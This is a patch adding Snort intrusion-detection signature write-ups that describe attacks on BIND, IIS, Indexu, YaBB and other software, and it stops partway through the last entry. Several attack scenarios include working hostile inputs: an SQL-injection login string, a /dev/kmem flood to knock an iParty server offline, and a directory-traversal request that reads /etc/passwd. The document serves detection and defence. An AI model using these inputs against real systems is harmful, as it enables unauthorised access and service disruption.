+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2117.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2117
+--
+Summary:
+This event is generated when an attempt is made to access the file myaccount/login.asp in the BTTLXE Forum application from Battleaxe Software.
+
+--
+Impact:
+Possible theft of data and control of the targeted application leading to a compromise of all resources on the machine not limited to user accounts and business data.
+
+--
+Detailed Information:
+The BTTLXE Forum is a web application used for web-based discussion forums.
+
+A vulnerability exists such that an attacker may gain control of the application via an SQL injection technique. One such scenario allows an attacker to access the system by supplying a specific password without a username in the login page.
+
+Affected Systems:
+	All versions of BTTLXE Forum software.
+
+--
+Attack Scenarios:
+The attacker may login to the Forum with the password 'or''='
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Refer to the vendor notification and fix information at http://www.battleaxesoftware.com/forums/forum.asp?forumid=36&select=1812
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0215
+
+Bugtraq:
+http://www.securityfocus.com/bid/7416
+
+Vendor:
+http://www.battleaxesoftware.com/forums/forum.asp?forumid=36&select=1812
+
+--
--- /dev/null
+++ b/doc/signatures/100000845.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000845
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "ipsclass.php" with SQL commands being passed as the "HTTP_CLIENT_IP" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "HTTP_CLIENT_IP" parameter in the "ipsclass.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000586.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000586
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_alter_change.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"db_alter_change.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1036.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1036
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2436.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2436
+
+--
+Summary:
+This event is generated when an attempt is made to access a file type
+that may be subject to a known vulnerability in Microsoft Windows Explorer.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+When processing Windows Extended Metafile Format (.emf) files, Windows
+Explorer sets a buffer size based on information in the header for the
+file. If a malformed header is sent, it may be possible for an attacker
+to cause a DoS condition to occur. It may also be possible for an
+attacker to execute code of their choosing on a vulnerable host.
+
+This issue may also affect Microsoft Windows Metafile Format (.wmf)
+files also.
+
+--
+Affected Systems:
+	Microsoft Windows XP Home, Professional and Media Center Edition
+	Microsoft Windows XP Home and Professional SP-1
+
+--
+Attack Scenarios:
+An attacker might supply a specially crafted request for such a file
+that might cause the error condiion to occur.
+
+--
+Ease of Attack:
+Moderate/Difficult
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000593.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000593
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "head.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "head.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1912.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1912
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access. This attack may permit execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite
+applications to perform remote distributed system administration tasks
+such as adding new users. A buffer overflow associated with the
+NETMGT_PROC_SERVICE request of sadmind exists because of improper bounds
+checking. This may permit execution of arbitrary commands with the
+privileges of root.
+
+--
+Affected Systems:
+	Sun Solaris 2.5, 2.5.1, 2.6, 7.0
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root
+access to the remote host.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2278.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+2278
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a Denial of Service (DoS) condition in the Monit web server.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+The Monit web server does not perform stringent checks on HTTP
+parameters prior to processing. This may allow a remote attacker to
+issue a DoS condition against a server running Monit.
+
+--
+Affected Systems:
+	Monit 4.1 and prior
+
+--
+Attack Scenarios:
+By supplying certain HTTP parameters to the Monit server a DoS condition
+may be executed.
+
+--
+Ease of Attack:
+Simple. Exploit code exists but is not currently in the public domain.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1870.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1870
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3154.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2922
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using UDP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+UDP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/119-9.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+119-9
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to obfuscate an attack or an attempt to
+evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects a
+"\" character being used where a "/" is normally expected in a web
+request.
+
+This may be an attempt to obfuscate an attack or an attempt to evade an
+IDS.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+
+--
+Attack Scenarios: 
+An attacker merely needs to use a "\" character instead of a "/"' in a
+web request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/1605.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+
+1605
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of Service to a host running iParty.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+iParty is an audio/text chat program for Windows.  The iParty server listens on a specified port 6004 for client requests. An attacker can connect to the chat server and send a large amount of '^?' characters (ASCII 255 or Hex FF), the server will simply shutdown and disconnect all the current users.  
+
+--
+Affected Systems:
+	iParty prior to 1.2
+
+--
+Attack Scenarios:
+cat /dev/kmem | telnet target 6004
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+http://www.securityspace.com/smysecure/catid.html?id=10111
+
+--
--- /dev/null
+++ b/doc/signatures/453.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+453
+
+--
+Summary:
+This event is generated when an ICMP Timestamp request is made.
+
+--
+Impact:
+Information gathering.  An ICMP Timestamp request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP Timestamp request is used by the ping command to elicit an ICMP Timestamp reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, and attacker may try to use type 13 (timestamp) as an alternative.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP Timestamp request may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP Timestamp requests.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2401.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2401
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule may not generate an alert if a legitimate SMB request contains a password
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
--- /dev/null
+++ b/doc/signatures/1673.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1673
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000636.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000636
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_delete_file.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_delete_file.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/806.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+806
+
+--
+Summary:
+This event is generated when an attempt is made to access a file outside the root directory of a webserver running YaBB.cgi.
+
+
+--
+Impact:
+
+Information disclosure.
+
+--
+Detailed Information:
+
+YaBB.cgi is widely used web-based BBS script. Due to input validation problems in YaBB, a remote attacker can traverse the directory structure and view any files and view any file that a webserver has access to.
+
+This event indicates that a remote attacker has attempted to view a file outside the webservers root directory.
+
+--
+Affected Systems:
+
+YaBB YaBB 9.1.2000
+
+--
+Attack Scenarios:
+
+An attacker issues the following command on port 80 of the webserver:
+
+GET http://target/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00 HTTP/1.0
+
+--
+Ease of Attack:
+
+Simple. No exploit software required.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+ 
+Update to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000116.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+100000116
+
+-- 
+Summary: 
+This event is generated when the PHP-Nuke program's Web_Links module is access 
+with a value for the CID parameter which is not numeric.
+
+-- 
+
+Impact: 
+Sensitive path information may be disclosed, allowing an attacker to conduct 
+reconnaissance against the affected host.
+
+--
+Detailed Information:
+Queries made to PHP-Nuke's Web_Links module which use non-numeric values for 
+the CID parameter will generate an error that discloses sensitive path 
+information about the affected host.
+
+--
+Affected Systems:
+PHP-Nuke 6.0
+PHP-Nuke 6.5
+PHP-Nuke 6.5 RC1
+PHP-Nuke 6.5 RC2
+PHP-Nuke 6.5 RC3
+PHP-Nuke 6.5 BETA 1
+PHP-Nuke 6.5 FINAL
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser.
+-- 
+
+Ease of Attack: 
+Simple, as example exploit URIs exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unsupported fix exists at the URI referenced in the Additional References 
+section. No vendor-supplied patch or workaround exists.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.securityfocus.com/archive/1/321313
+
+--
--- /dev/null
+++ b/doc/signatures/258.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+258
+
+--
+Summary:
+This event is generated when an exploit that targets vulnerabilities in 
+BIND 8.2 and 8.2.1 ("ADM named exploit 8.2/8.2.1") is executed against a
+local DNS server.
+
+--
+Impact:
+Severe. Remote code execution with the privileges of the BIND DNS daemon
+(named). 
+
+--
+Detailed Information:
+BIND is DNS server software shipped with a number of UNIX and 
+Linux-based operating systems. Attackers can exploit multiple 
+vulnerabilities in BIND versions between 8.2 and 8.2.1 to obtain remote 
+shell access. This enables the attacker to execute arbitrary code from 
+the command shell with the security privileges of the BIND DNS daemon 
+(named). If named is running as root, the attacker automatically obtains
+root privileges to the system.
+
+--
+Affected Systems:
+Any operating system running BIND implementations below 8.2.2.
+
+--
+Attack Scenarios:
+An attacker executes an exploit script against a vulnerable server, 
+obtaining shell access to the compromised machine. If named is running 
+as root, the attacker automatically obtains root privileges on the 
+server. Otherwise, the attacker can execute arbitrary code with the 
+privileges of named, which can lead to remote root compromise.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to BIND 8.2.2 or higher.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak (judy.novak@sourcefire.com)
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000465.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000465
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Empris" application running on a webserver. 
+Access to the file "sql_fcnsOLD.php" using a remote file being passed as the 
+"phormationdir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "phormationdir" parameter in the "sql_fcnsOLD.php" 
+script used by the "Empris" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Empris
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/639.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 639
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
